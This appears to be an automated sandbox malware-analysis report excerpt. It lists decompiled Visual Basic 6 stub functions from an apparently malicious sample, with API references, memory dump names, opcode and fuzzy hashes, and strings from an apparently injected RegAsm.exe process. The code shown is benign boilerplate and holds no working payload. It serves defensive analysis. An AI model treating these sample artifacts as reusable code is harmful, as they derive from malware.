				void* _v28;
				void* _v32;
				void* _t17;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L00401740();
				_v16 = _t30;
				_v12 = 0x401710;
				_v8 = 0;
				_t17 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x10,  *[fs:0x0], 0x401746, _t27);
				L004018D8();
				L004018D8();
				_push(0x43133c);
				L004018D2();
				L004018D2();
				return _t17;
			}

0x004312d3
0x004312e2
0x004312ec
0x004312f4
0x004312f7
0x004312fe
0x0043130d
0x00431316
0x00431321
0x00431326
0x0043132e
0x00431336
0x0043133b

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 004312EC
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 00431316
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 00431321
__vbaFreeStr.MSVBVM60(0043133C,?,?,?,?,00401746), ref: 0043132E
__vbaFreeStr.MSVBVM60(0043133C,?,?,?,?,00401746), ref: 00431336

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 7d65817c5375ec088c1d941134fd6a6d6c7b18b25c24dd880147da789c4c3e68
Instruction ID: aa63edb3019502c3e60f8209c67fec18ffe02c56516e24cd0e530d8bb066e38e
Opcode Fuzzy Hash: 7d65817c5375ec088c1d941134fd6a6d6c7b18b25c24dd880147da789c4c3e68
Instruction Fuzzy Hash: 9DF0F935900249ABCB00EF56C886B9EBB74FF05744F50842AF401672E1D778AA45CB88

Uniqueness

Uniqueness Score: 100.00%

Function 00430884, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00430884(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _t17;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L00401740();
				_v16 = _t30;
				_v12 = 0x401600;
				_v8 = 0;
				_t17 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x10,  *[fs:0x0], 0x401746, _t27);
				L004018D8();
				L004018D8();
				_push(0x4308f0);
				L004018D2();
				L004018D2();
				return _t17;
			}

0x00430887
0x00430896
0x004308a0
0x004308a8
0x004308ab
0x004308b2
0x004308c1
0x004308ca
0x004308d5
0x004308da
0x004308e2
0x004308ea
0x004308ef

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 004308A0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 004308CA
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 004308D5
__vbaFreeStr.MSVBVM60(004308F0,?,?,?,?,00401746), ref: 004308E2
__vbaFreeStr.MSVBVM60(004308F0,?,?,?,?,00401746), ref: 004308EA

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: aff916690c7d1efd8e95476f27dd50b1b9702a335a4df5545faebd572764e09d
Instruction ID: 4d51bb85e1bcd24ea1e4429e73c8f15578c5c94c4e7605d7c532a6db533278a7
Opcode Fuzzy Hash: aff916690c7d1efd8e95476f27dd50b1b9702a335a4df5545faebd572764e09d
Instruction Fuzzy Hash: 51F0F931940209AFCB01FF66C996F9EBB74EF05744F50842AF405772E1D778AA46CB94

Uniqueness

Uniqueness Score: 100.00%

Function 0042D94F, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0042D94F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _t17;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L00401740();
				_v16 = _t30;
				_v12 = 0x4013d0;
				_v8 = 0;
				_t17 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x10,  *[fs:0x0], 0x401746, _t27);
				L004018D8();
				L004018D8();
				_push(0x42d9bb);
				L004018D2();
				L004018D2();
				return _t17;
			}

0x0042d952
0x0042d961
0x0042d96b
0x0042d973
0x0042d976
0x0042d97d
0x0042d98c
0x0042d995
0x0042d9a0
0x0042d9a5
0x0042d9ad
0x0042d9b5
0x0042d9ba

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042D96B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042D995
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042D9A0
__vbaFreeStr.MSVBVM60(0042D9BB,?,?,?,?,00401746), ref: 0042D9AD
__vbaFreeStr.MSVBVM60(0042D9BB,?,?,?,?,00401746), ref: 0042D9B5

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 3da5496eada1e89e8d8436d6f4dabe18a766f7caf742880bb984f040d935410a
Instruction ID: 94533c7cc78c921e515c7acf32503e83058e9e2f208172c31c08e1040f9565ff
Opcode Fuzzy Hash: 3da5496eada1e89e8d8436d6f4dabe18a766f7caf742880bb984f040d935410a
Instruction Fuzzy Hash: 87F0F971900209ABCB00EF96D986B9EBB74EF15748F50C02AF405A72E1D778AA45CB84

Uniqueness

Uniqueness Score: 100.00%

Function 0042C7D3, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0042C7D3(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _t17;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L00401740();
				_v16 = _t30;
				_v12 = 0x401210;
				_v8 = 0;
				_t17 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x10,  *[fs:0x0], 0x401746, _t27);
				L004018D8();
				L004018D8();
				_push(0x42c83f);
				L004018D2();
				L004018D2();
				return _t17;
			}

0x0042c7d6
0x0042c7e5
0x0042c7ef
0x0042c7f7
0x0042c7fa
0x0042c801
0x0042c810
0x0042c819
0x0042c824
0x0042c829
0x0042c831
0x0042c839
0x0042c83e

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042C7EF
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042C819
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042C824
__vbaFreeStr.MSVBVM60(0042C83F,?,?,?,?,00401746), ref: 0042C831
__vbaFreeStr.MSVBVM60(0042C83F,?,?,?,?,00401746), ref: 0042C839

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 34405acd249dc2ba162ed96b2e269fa47848a34b72f836ebefb835df54976fb8
Instruction ID: f0bc93423afafe0c3e629b04362c2916a1a746cf7fdd53cd9dc97f9f79340633
Opcode Fuzzy Hash: 34405acd249dc2ba162ed96b2e269fa47848a34b72f836ebefb835df54976fb8
Instruction Fuzzy Hash: F1F0F931940209ABCB00FF96C986B9EBB74EF15744F50C46AF405B72E1D778AA45CB88

Uniqueness

Uniqueness Score: 100.00%

Function 004309E7, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E004309E7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _t17;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L00401740();
				_v16 = _t30;
				_v12 = 0x401628;
				_v8 = 0;
				_t17 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x10,  *[fs:0x0], 0x401746, _t27);
				L004018D8();
				L004018D8();
				_push(0x430a53);
				L004018D2();
				L004018D2();
				return _t17;
			}

0x004309ea
0x004309f9
0x00430a03
0x00430a0b
0x00430a0e
0x00430a15
0x00430a24
0x00430a2d
0x00430a38
0x00430a3d
0x00430a45
0x00430a4d
0x00430a52

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 00430A03
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 00430A2D
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 00430A38
__vbaFreeStr.MSVBVM60(00430A53,?,?,?,?,00401746), ref: 00430A45
__vbaFreeStr.MSVBVM60(00430A53,?,?,?,?,00401746), ref: 00430A4D

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 507d074e662bc22353b3e690a0913456c96b8dbed667381a9df1c7d8c6a00dd6
Instruction ID: 59359c037ecc278558ae1e5b3b046928243e882b22cd0e3f5a4271045c81d77b
Opcode Fuzzy Hash: 507d074e662bc22353b3e690a0913456c96b8dbed667381a9df1c7d8c6a00dd6
Instruction Fuzzy Hash: A4F0F931900209AFCB00FF56C896B9EBBB8EF15704F50C42AF401672E1D778AA46CB88

Uniqueness

Uniqueness Score: 100.00%

Function 0042D80C, Relevance: 7.5, APIs: 5, Instructions: 29
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E0042D80C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				void* _v32;
				void* _t10;
				intOrPtr _t23;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t23;
				_t10 = 0x10;
				L00401740();
				_v12 = _t23;
				_v8 = 0x4013b0;
				L004018D8();
				L004018D8();
				asm("wait");
				_push(0x42d866);
				L004018D2();
				L004018D2();
				return _t10;
			}

0x0042d811
0x0042d81c
0x0042d81d
0x0042d826
0x0042d827
0x0042d82f
0x0042d832
0x0042d83f
0x0042d84a
0x0042d84f
0x0042d850
0x0042d858
0x0042d860
0x0042d865

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042D827
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042D83F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042D84A
__vbaFreeStr.MSVBVM60(0042D866,?,?,?,?,00401746), ref: 0042D858
__vbaFreeStr.MSVBVM60(0042D866,?,?,?,?,00401746), ref: 0042D860

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: a7e9c5acacdfeadc9b74e7d74a066e52ab481cec7526e6eb58c777d3e2422709
Instruction ID: 60ff4ceedfb95cb77316ccdac936894dabee0052cc20783c0c51583674ff51eb
Opcode Fuzzy Hash: a7e9c5acacdfeadc9b74e7d74a066e52ab481cec7526e6eb58c777d3e2422709
Instruction Fuzzy Hash: 5FF05E7190020ABBDB04EB52C883FAFBB38EB01B44F50852AB101672E0DB786A458798

Uniqueness

Uniqueness Score: 100.00%

Function 0042C45C, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E0042C45C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _t10;
				intOrPtr _t23;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t23;
				_t10 = 0x10;
				L00401740();
				_v12 = _t23;
				_v8 = 0x4011a0;
				L004018D8();
				L004018D8();
				_push(0x42c4b5);
				L004018D2();
				L004018D2();
				return _t10;
			}

0x0042c461
0x0042c46c
0x0042c46d
0x0042c476
0x0042c477
0x0042c47f
0x0042c482
0x0042c48f
0x0042c49a
0x0042c49f
0x0042c4a7
0x0042c4af
0x0042c4b4

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042C477
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042C48F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042C49A
__vbaFreeStr.MSVBVM60(0042C4B5,?,?,?,?,00401746), ref: 0042C4A7
__vbaFreeStr.MSVBVM60(0042C4B5,?,?,?,?,00401746), ref: 0042C4AF

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: f2cc8272fd94568ba7c639fccf47a6346361bd401787542ff56993094fb09ba6
Instruction ID: 46851a2f931a3062b06a228dc5267d5968dab155b516dbef90a21c9825b39e0e
Opcode Fuzzy Hash: f2cc8272fd94568ba7c639fccf47a6346361bd401787542ff56993094fb09ba6
Instruction Fuzzy Hash: 8FF05E71900209ABCB04EF52CC83FAFBB38EB01704F50842AB101771E0D77C6A018798

Uniqueness

Uniqueness Score: 100.00%

Function 0042DEE3, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Download Yara Rule

C-Code - Quality: 71%

			E0042DEE3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _t10;
				intOrPtr _t23;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t23;
				_t10 = 0xc;
				L00401740();
				_v12 = _t23;
				_v8 = 0x401478;
				L004018D8();
				L004018D8();
				_push(0x42df3c);
				L004018D2();
				L004018D2();
				return _t10;
			}

0x0042dee8
0x0042def3
0x0042def4
0x0042defd
0x0042defe
0x0042df06
0x0042df09
0x0042df16
0x0042df21
0x0042df26
0x0042df2e
0x0042df36
0x0042df3b

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042DEFE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042DF16
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042DF21
__vbaFreeStr.MSVBVM60(0042DF3C,?,?,?,?,00401746), ref: 0042DF2E
__vbaFreeStr.MSVBVM60(0042DF3C,?,?,?,?,00401746), ref: 0042DF36

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 89d6ff5b5b5ba68f8e786a0064709bc07ebf3a3a84fe6c343736c768573b1e8e
Instruction ID: a87a07d62670e9390379170e5dfe6ed31f39c8d3c8138e95c4a6a31d6c89ade8
Opcode Fuzzy Hash: 89d6ff5b5b5ba68f8e786a0064709bc07ebf3a3a84fe6c343736c768573b1e8e
Instruction Fuzzy Hash: 38F01271940249ABDB04EF52CD87FAFB778EB11744F50452EB101731E1D7786A01C798

Uniqueness

Uniqueness Score: 100.00%

Function 0042CD14, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E0042CD14(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _t10;
				intOrPtr _t23;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t23;
				_t10 = 0xc;
				L00401740();
				_v12 = _t23;
				_v8 = 0x401298;
				L004018D8();
				L004018D8();
				_push(0x42cd6d);
				L004018D2();
				L004018D2();
				return _t10;
			}

0x0042cd19
0x0042cd24
0x0042cd25
0x0042cd2e
0x0042cd2f
0x0042cd37
0x0042cd3a
0x0042cd47
0x0042cd52
0x0042cd57
0x0042cd5f
0x0042cd67
0x0042cd6c

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042CD2F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042CD47
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042CD52
__vbaFreeStr.MSVBVM60(0042CD6D,?,?,?,?,00401746), ref: 0042CD5F
__vbaFreeStr.MSVBVM60(0042CD6D,?,?,?,?,00401746), ref: 0042CD67

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: a0b3df68eac5de99995a93e1d81a5cf9622832220af32fb824a3e830f49e7edf
Instruction ID: 45d4e9623ed16223d03a9ee9da8b9df933e6f4ec27c3b7d1c1a2b98e622a8fa2
Opcode Fuzzy Hash: a0b3df68eac5de99995a93e1d81a5cf9622832220af32fb824a3e830f49e7edf
Instruction Fuzzy Hash: 91F05E71500209ABDB00EB52C983FAEBB38EB01B04F50852EB001731E0D7786A01C754

Uniqueness

Uniqueness Score: 100.00%

Function 004303FE, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Download Yara Rule

C-Code - Quality: 71%

			E004303FE(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _t10;
				intOrPtr _t23;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t23;
				_t10 = 0x14;
				L00401740();
				_v12 = _t23;
				_v8 = 0x401570;
				L004018D8();
				L004018D8();
				_push(0x430457);
				L004018D2();
				L004018D2();
				return _t10;
			}

0x00430403
0x0043040e
0x0043040f
0x00430418
0x00430419
0x00430421
0x00430424
0x00430431
0x0043043c
0x00430441
0x00430449
0x00430451
0x00430456

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 00430419
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 00430431
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0043043C
__vbaFreeStr.MSVBVM60(00430457,?,?,?,?,00401746), ref: 00430449
__vbaFreeStr.MSVBVM60(00430457,?,?,?,?,00401746), ref: 00430451

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 0af345943c8a56e1bc009f936ac54282c262b380d3fee0d5db5c6b6a7a5a0d31
Instruction ID: 7e694333d1474d11b9e776294f9f473a783fd8e25fd1ff3a1adcc0d1785c8d63
Opcode Fuzzy Hash: 0af345943c8a56e1bc009f936ac54282c262b380d3fee0d5db5c6b6a7a5a0d31
Instruction Fuzzy Hash: 38F0FE71940209ABCB04EB52C997EAFBB78EB11744F50812EB101771E1D7786A058B98

Uniqueness

Uniqueness Score: 100.00%

Function 0042DB88, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Download Yara Rule

C-Code - Quality: 71%

			E0042DB88(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _t10;
				intOrPtr _t23;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t23;
				_t10 = 0xc;
				L00401740();
				_v12 = _t23;
				_v8 = 0x401410;
				L004018D8();
				L004018D8();
				_push(0x42dbe1);
				L004018D2();
				L004018D2();
				return _t10;
			}

0x0042db8d
0x0042db98
0x0042db99
0x0042dba2
0x0042dba3
0x0042dbab
0x0042dbae
0x0042dbbb
0x0042dbc6
0x0042dbcb
0x0042dbd3
0x0042dbdb
0x0042dbe0

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042DBA3
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042DBBB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042DBC6
__vbaFreeStr.MSVBVM60(0042DBE1,?,?,?,?,00401746), ref: 0042DBD3
__vbaFreeStr.MSVBVM60(0042DBE1,?,?,?,?,00401746), ref: 0042DBDB

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: aef024597b3943a44756669e42f56620d989c281053ad498a21c3680c135af40
Instruction ID: 4f13d5b3a0a62b34932044c451f351c29f30e312ac970dfedd7e9e9ad4d0fea1
Opcode Fuzzy Hash: aef024597b3943a44756669e42f56620d989c281053ad498a21c3680c135af40
Instruction Fuzzy Hash: 50F05E71900209ABCB04EB52C893FAFBB38EB01748F50842AF001771E0D7786A01C794

Uniqueness

Uniqueness Score: 100.00%

Analysis Process: RegAsm.exe PID: 5096 Parent PID: 2608 RegAsm.exeUNIQUE

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	53.5%
Signature Coverage:	28.2%
Total number of Nodes:	273
Total number of Limit Nodes:	13

Executed Functions

Function 222F0006, Relevance: 223.6, Strings: 169, Instructions: 12393UNIQUE

Download Yara Rule

Strings

`o@, xrefs: 222F43A2
@A@, xrefs: 222F1F53
#@, xrefs: 222F0385
p]@, xrefs: 222F35EC
P;@, xrefs: 222F19FE
pv@, xrefs: 222F49FB
Pw@, xrefs: 222F4ABE
p@, xrefs: 222FB5E4
}@, xrefs: 222F4FD2
H@, xrefs: 222F256B
Pn@, xrefs: 222F429E
P@, xrefs: 222FB319
`+@, xrefs: 222F0B64
P*@, xrefs: 222F0A60
%@, xrefs: 222F058D
Pk@, xrefs: 222F4014
H@, xrefs: 222F25ED
@3@, xrefs: 222F12A2
A, xrefs: 222FD5E2
`y@, xrefs: 222F4C85
PV@, xrefs: 222F319B
01@, xrefs: 222F10B2
p/@, xrefs: 222F0EF2
P!@, xrefs: 222F01BE
0(@, xrefs: 222F0858
v@, xrefs: 222F49BA
p2@, xrefs: 222F11E8
$@, xrefs: 222F054C
$@, xrefs: 222F0489
@'@, xrefs: 222F0795
P7@, xrefs: 222F1644
@4@, xrefs: 222F139A
@, xrefs: 222FB49F
.@, xrefs: 222F0E70
p@, xrefs: 222FB04E
`B@, xrefs: 222F2057
PQ@, xrefs: 222F2DCC
0@, xrefs: 222FB00D
`N@, xrefs: 222F2B01
`#@, xrefs: 222F03C6
pl@, xrefs: 222F40D7
Y@, xrefs: 222F3321
pP@, xrefs: 222F2D09
`$@, xrefs: 222F04CA
00@, xrefs: 222F0FB5
0@, xrefs: 222FB111
@p@, xrefs: 222F4465
/@, xrefs: 222F0EB1
;@, xrefs: 222F1A80
Pm@, xrefs: 222F419A
_@, xrefs: 222F3772
p)@, xrefs: 222F099D
`X@, xrefs: 222F329F
u@, xrefs: 222F4979
M@, xrefs: 222F2A7F
L@, xrefs: 222F297B
P@, xrefs: 222FB45E
Ps@, xrefs: 222F4730
0:@, xrefs: 222F18FA
P@, xrefs: 222FAE46
X@, xrefs: 222F32E0
|@, xrefs: 222F4F91
p0@, xrefs: 222F0FF6
<@, xrefs: 222F1AC1
0)@, xrefs: 222F095C
B@, xrefs: 222F2016
P6@, xrefs: 222F154C
`%@, xrefs: 222F05CE
pf@, xrefs: 222F3CC7
O@, xrefs: 222F2C87
>@, xrefs: 222F1C88
K@, xrefs: 222F2877
pi@, xrefs: 222F3ECF
0&@, xrefs: 222F0691
'@, xrefs: 222F0817
P8@, xrefs: 222F173C
K@, xrefs: 222F27B4
@, xrefs: 222FB931
@t@, xrefs: 222F47F3
`D@, xrefs: 222F221E
p,@, xrefs: 222F0C68
Pb@, xrefs: 222F39FC
Ph@, xrefs: 222F3E0C
o@, xrefs: 222F4361
0d@, xrefs: 222F3B41
0]@, xrefs: 222F35AB
`q@, xrefs: 222F4569
